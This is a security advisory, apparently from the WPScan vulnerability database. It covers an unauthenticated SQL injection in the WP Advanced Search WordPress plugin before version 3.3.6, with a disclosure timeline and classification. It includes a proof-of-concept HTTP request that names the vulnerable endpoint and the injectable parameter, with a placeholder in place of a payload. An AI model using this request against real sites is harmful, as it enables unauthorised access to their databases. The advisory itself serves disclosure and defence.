WP Advanced Search < 3.3.6 - Unauthenticated SQL Injection



Description
Due to using string concatenation, allowing direct access to a vulnerable PHP file and missing best-practices for coding SQL operations, there exists an unauthenticated SQL injection in autocompletion-PHP5.5.php.

After a month of trying to contact the Plugin author (Twitter, email), we followed generally accepted disclosure guidelines.

Edit (WPScanTeam):
April 1st, 2020 - Report received & Escalated to WP Plugins Team
April 1st, 2020 - WP Plugin Team Investigating & Plugin closed
April 2nd, 2020 - Disclosing
April 3rd, 2020 - v3.3.6 released, fixing the issue
Proof of Concept
GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[INJECT]&type=&e= HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Affects Plugin

fixed in version 3.3.6

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Teamwork
Submitter Twitter @frycos
Views 1573
Verified No
WPVDB ID 10162

Timeline

Publicly Published 2020-04-02 (about 2 months ago)
Added 2020-04-02 (about 2 months ago)
Last Updated 2020-04-10 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin